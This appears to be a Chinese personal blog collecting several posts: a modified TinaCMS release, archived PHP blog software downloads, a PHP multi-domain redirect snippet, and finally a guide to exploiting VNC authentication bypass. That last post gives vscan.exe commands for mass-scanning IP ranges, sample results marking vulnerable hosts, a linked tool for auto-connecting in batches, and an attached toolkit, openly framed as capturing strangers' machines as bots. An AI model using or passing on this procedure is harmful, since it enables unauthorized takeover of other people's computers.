注意:本程序非本人原创,是TinaCMS的改造版本,本程序是开源软件,不收取任何费用,可以用于任何用途.

我正在开发完全由我自己编写的cms,可能要等几个月后发布,现在还在解决部分技术问题.       -2007.3.18

大部分技术问题都已经找到解决办法,只是没有足够的时间来写那么多代码,不过我会尽量抽时间来写的,我觉得这个思路非常的好,如果cms写完了,我希望能够继续完善,并且用同一套核心代码来编写属于我自己的blog和bbs.不过那可能要等很久,我现在实在是太忙了.          - 2007.4.21

一天两夜,终于算是改造完毕了,再加强大的功能就不会是一天两天的事情了.

TinaCMS,迷你CMS系统 - 快速建站系统堪称史上最小的CMS系统,压缩包不足7K大小,适用于快速构架小规模树型结构网站.强大的自由度可以让您充分发挥您的想象.

• 演示地址
• 下载地
  

简洁的页面

健全的后台

快捷的安装

方便的模板管理

运行环境：
php+ mysql

安装指南：

1. 将主程序复制到任何目录下
2. 将该目录的属性改为0777(Windows服务器可省略此步)
3. 访问主程序进行安装
   主要修改内容

基于1.2

1. 优化了部分代码,提高了执行效率

2. 去掉了生成页面的分页功能,因为原版的分页函数有错误

3. 修正了删除文件不彻底的问题

4. 增加了显示当前位置的功能

5. 改进了刷新机制,可以避免一些不必要的麻烦

6. 全面支持xhtml

7. 修改了前台和后台的模板
   基于1.0

8. 增加了演示数据

9. 改进了 bbcode 支持 flash 等文档

10. 修改个别文字错误

11. 改进了修改模板后直接重生成

12. 改进了索引方式

13. 改进了插入文件的功能(增加了默认目录)
    下个版本计划

• 生成页面的分页功能
• 强化编辑器和BBCODE
• 改进刷新机制
• 改进文件和数据库的操作
• 改进静态页面生成机制,减少服务器负担
• …

附件:tinacms.rar(8949 Byte)

这些是前一阵子收集的安全天使文章系统的全部版本,sarticle1.0,sarticle1.5和sarticle1.8.

还有一个angel改写的留言簿sagb.都拿出来和初学php的朋友们分享一下.

注意:部分程序无法在新版本的php环境下运行.

附件:sarticle1.0.rar(25984 Byte)

附件:sarticle_v1.5.rar(40953 Byte)

附件:sarticle_v1.8.rar(46166 Byte)

附件:sagb.rar(8628 Byte)

最近收集了sablog系列的大部分版本,但最终都没有找到sablog的第一个版本sablog1.1.

附件为sablog1.5,sablog1.8,sablog2.0,sablog2.5,sablog2.6,sablog2.8和sablog-x 1.2下载.

用来学习php是非常不错的选择.

注:由于php版本兼容问题,一些早期版本无法在部分php版本中正常运行.

附件:sablog_v1.5.rar(45685 Byte)

附件:sablog_v1.8.rar(55800 Byte)

附件:sablog_v2.0.rar(60806 Byte)

附件:sablog_v2.5.rar(173104 Byte)

附件:sablog_v2.6.rar(213188 Byte)

附件:sablog_v2.8.rar(642545 Byte)

附件:sablog-x1.2.rar(404928 Byte)

因为看了老猪写的多域名代码,感觉他的代码多少有些不足,特意为大家写一个最佳解决方案.

这里我们假设我们有一个空间,而我们有两个域名m4ker.net和m4ker.com.

这里假设我要用m4ker.net建立一个博客,而m4ker.com要建立一个论坛.

那么我们创建两个目录,blog和bbs分别放我们的程序.

然后需要做两个入口页,就是类似www.m4ker.net这个一样,连接到你程序用的,我们写一个blog.htm里面有你博客的链接,再写一个bbs.htm里面有你论坛的链接.

我们把这两个入口页放在空间www根目录下,并且建立index.php代码如下.

1
2
3
4
5
6
7
8
9

if($HTTP_HOST=="[www.m4ker.net](http://www.m4ker.net)" or $HTTP_HOST=="[m4ker.net](http://www.foolbird.net/)"){
include ("blog.htm");
}
elseif($HTTP_HOST=="[www.m4ker.com](http://www.m4ker.com)" or $HTTP_HOST=="[m4ker.com](http://www.m4ker.com/)"){
include ("bbs.htm");
}
else{
include ("other.htm");
}

这样当访问www.m4ker.net和m4ker.net的时候就出现博客的入口页面,当访问www.m4ker.com和m4ker.com的时候就出现论坛的入口页了.

VNC(virtual network computing),是一种由AT&T开发的远程控制的技术,简单来说,就是将远端的图形桌面显示到本地终端.有点类似微软的3389.

VNC漏洞利用工具包括两部分vscan.exe(在一些工具包中也叫VNC_bypauth.exe),主要用来扫描有vnc漏洞的主机.还有一个VNCLink.exe,这个也就是VNC Viewer,是一款vnc连接工具,类似3389.

国外很多的计算机都开启了vnc服务,我们可以利用vnc漏洞来进行抓肉鸡.

vscan的使用格式如下

vscan.exe -i StarIP-EndIP -p Port  -vnc -Option

例子:

vscan.exe -i 192.168.0.0-192.168.255.255 -p 5900 -vnc -vv

扫描完毕vscan会将结果保存在VNC_pauth.txt文件中.

文件内容如下

[php]—————————————————————————-
COMMAND: vscan.exe -i 192.168.0.0-192.168.255.255 -p 5900 -vnc -w

192.168.139.170  :5900     connection closed
192.168.139.170  :5900     vnc4:banned
192.168.139.23   :5900     vnc4:patched
192.168.139.122  :5900     vnc4:patched
192.168.139.188  :5900     vnc4:patched
192.168.139.75   :5900     vnc4:banned
192.168.139.160  :5900     vnc4:VULNERABLE
192.168.139.181  :5900     vnc4:banned
192.168.139.251  :5900     vnc4:patched
192.168.139.89   :5900     vnc4:banned
192.168.139.110  :5900     vnc4:patched

Scan complete
——————————————–[heapoverflow.com 2004-2005]—-[/php]

类似192.168.139.160  :5900     vnc4:VULNERABLE这样后面有vnc4:VULNERABLE的就是可以连接的主机了,可以用VNCLink.exe直接连接.

如果连接上去的时候对方没有锁定计算机,那么恭喜你,你已经拿到一台肉鸡了.

因为扫描后要手动连接主机去验证主机是否可以控制,那么不停的连接就会变的很麻烦,这里给大家提供一个我自己写的工具来自动筛选可连接ip并且生成批处理程序自动进行连接,

工具地址 http://www.foolbird.net/online/vnc/

将你的vnc viewer路径填上,再将VNC_pauth.txt的内容粘贴到文本框中,然后进行生成,当出现结果页的时候查看网页的源代码,然后以.bat格式保存就可以了.

然后就可以用所生成批处理文件来进行自动连接了.

附件:vnc.rar(143206 Byte)